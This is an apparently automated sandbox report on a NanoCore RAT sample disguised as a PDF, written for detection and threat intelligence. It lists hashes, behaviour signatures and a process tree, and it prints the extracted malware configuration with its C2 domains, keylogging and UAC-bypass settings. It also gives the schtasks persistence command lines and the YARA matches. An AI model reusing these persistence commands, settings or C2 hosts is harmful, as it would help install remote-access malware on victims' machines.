
Windows Analysis Report
026910003102350.pdf.scr.exe

Overview

General Information

Sample Name: 026910003102350.pdf.scr.exe
Analysis ID: 796783
MD5: c2a80ccf6362bba805072de9ce963ea5
SHA1: c7a0ca8b35e2c08e69f48d754dbdbf20f2d1d53f
SHA256: 592217d2590ae9ca688346688b2d7d13a78190f9562889597ebb79060136034c
Tags: exe

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file name differs from the original file name given in its version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

  • System is w10x64
  • 026910003102350.pdf.scr.exe (PID: 4980 cmdline: C:\Users\user\Desktop\026910003102350.pdf.scr.exe MD5: C2A80CCF6362BBA805072DE9CE963EA5)
    • wscript.exe (PID: 2312 cmdline: "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • itugx.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
        • RegSvcs.exe (PID: 5960 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
          • schtasks.exe (PID: 4544 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 2216 cmdline: schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
            • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 3300 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 4736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • RegSvcs.exe (PID: 5072 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • dhcpmon.exe (PID: 2960 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0 MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 5092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • wscript.exe (PID: 2896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 4036 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 3624 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • dhcpmon.exe (PID: 576 cmdline: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" MD5: 2867A3817C9245F7CF518524DFD18F28)
    • conhost.exe (PID: 1880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • itugx.exe (PID: 5928 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 5508 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 4776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 5420 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 5736 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • itugx.exe (PID: 5552 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
    • RegSvcs.exe (PID: 3928 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • wscript.exe (PID: 5776 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • itugx.exe (PID: 1712 cmdline: "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls MD5: 8A57722EC9067FAAA9FF2980C5F02838)
      • RegSvcs.exe (PID: 4764 cmdline: C:\Users\user\AppData\Local\Temp\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

{"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo />\r\n  <Triggers />\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>4</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>\"#EXECUTABLEPATH\"</Command>\r\n      <Arguments>$(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task"}
Source | Rule | Description | Author | Strings
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
  • 0x1104d:$x1: NanoCore.ClientPluginHost
  • 0x1108a:$x2: IClientNetworkHost
  • 0x14bbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0x10db5:$a: NanoCore
  • 0x10dc5:$a: NanoCore
  • 0x10ff9:$a: NanoCore
  • 0x1100d:$a: NanoCore
  • 0x1104d:$a: NanoCore
  • 0x10e14:$b: ClientPlugin
  • 0x11016:$b: ClientPlugin
  • 0x11056:$b: ClientPlugin
  • 0x10f3b:$c: ProjectData
  • 0x11942:$d: DESCrypto
  • 0x1930e:$e: KeepAlive
  • 0x172fc:$g: LogClientMessage
  • 0x134f7:$i: get_Connected
  • 0x11c78:$j: #=q
  • 0x11ca8:$j: #=q
  • 0x11cc4:$j: #=q
  • 0x11cf4:$j: #=q
  • 0x11d10:$j: #=q
  • 0x11d2c:$j: #=q
  • 0x11d5c:$j: #=q
  • 0x11d78:$j: #=q
00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Nanocore_d8c4e3c5 | unknown | unknown
  • 0x1104d:$a1: NanoCore.ClientPluginHost
  • 0x1100d:$a2: NanoCore.ClientPlugin
  • 0x12f66:$b1: get_BuilderSettings
  • 0x10e69:$b2: ClientLoaderForm.resources
  • 0x12686:$b3: PluginCommand
  • 0x1103e:$b4: IClientAppHost
  • 0x1b4be:$b5: GetBlockHash
  • 0x135be:$b6: AddHostEntry
  • 0x172b1:$b7: LogClientException
  • 0x1352b:$b8: PipeExists
  • 0x11077:$b9: IClientLoggingHost
00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
  • 0x103bd:$x1: NanoCore.ClientPluginHost
  • 0x103fa:$x2: IClientNetworkHost
  • 0x13f2d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
(table truncated; the full report lists 247 entries)
Source | Rule | Description | Author | Strings
28.3.itugx.exe.146edb8.0.raw.unpack | Nanocore_RAT_Gen_2 | Detetcs the Nanocore RAT | Florian Roth (Nextron Systems)
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
28.3.itugx.exe.146edb8.0.raw.unpack | Nanocore_RAT_Feb18_1 | Detects Nanocore RAT | Florian Roth (Nextron Systems)
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
28.3.itugx.exe.146edb8.0.raw.unpack | JoeSecurity_Nanocore | Yara detected Nanocore RAT | Joe Security
28.3.itugx.exe.146edb8.0.raw.unpack | MALWARE_Win_NanoCore | Detects NanoCore | ditekSHen
  • 0xfef5:$x1: NanoCore Client
  • 0xff05:$x1: NanoCore Client
  • 0x1014d:$x2: NanoCore.ClientPlugin
  • 0x1018d:$x3: NanoCore.ClientPluginHost
  • 0x10142:$i1: IClientApp
  • 0x10163:$i2: IClientData
  • 0x1016f:$i3: IClientNetwork
  • 0x1017e:$i4: IClientAppHost
  • 0x101a7:$i5: IClientDataHost
  • 0x101b7:$i6: IClientLoggingHost
  • 0x101ca:$i7: IClientNetworkHost
  • 0x101dd:$i8: IClientUIHost
  • 0x101eb:$i9: IClientNameObjectCollection
  • 0x10207:$i10: IClientReadOnlyNameObjectCollection
  • 0xff54:$s1: ClientPlugin
  • 0x10156:$s1: ClientPlugin
  • 0x1064a:$s2: EndPoint
  • 0x10653:$s3: IPAddress
  • 0x1065d:$s4: IPEndPoint
  • 0x12093:$s6: get_ClientSettings
  • 0x12637:$s7: get_Connected
28.3.itugx.exe.146edb8.0.raw.unpack | NanoCore | unknown | Kevin Breen <kevin@techanarchy.net>
  • 0xfef5:$a: NanoCore
  • 0xff05:$a: NanoCore
  • 0x10139:$a: NanoCore
  • 0x1014d:$a: NanoCore
  • 0x1018d:$a: NanoCore
  • 0xff54:$b: ClientPlugin
  • 0x10156:$b: ClientPlugin
  • 0x10196:$b: ClientPlugin
  • 0x1007b:$c: ProjectData
  • 0x10a82:$d: DESCrypto
  • 0x1844e:$e: KeepAlive
  • 0x1643c:$g: LogClientMessage
  • 0x12637:$i: get_Connected
  • 0x10db8:$j: #=q
  • 0x10de8:$j: #=q
  • 0x10e04:$j: #=q
  • 0x10e34:$j: #=q
  • 0x10e50:$j: #=q
  • 0x10e6c:$j: #=q
  • 0x10e9c:$j: #=q
  • 0x10eb8:$j: #=q
(table truncated; the full report lists 362 entries)

      AV Detection

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentImage: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ParentProcessId: 5960, ParentProcessName: RegSvcs.exe, ProcessCommandLine: schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp, ProcessId: 4544, ProcessName: schtasks.exe

      Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RegSvcs.exe, ProcessId: 5960, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

No Snort rule has matched


      AV Detection

Source: december2n.duckdns.org | Avira URL Cloud: Label: malware
Source: december2nd.ddns.net | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe | Avira: detection malicious, Label: DR/AutoIt.Gen
Source: Yara match | File source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
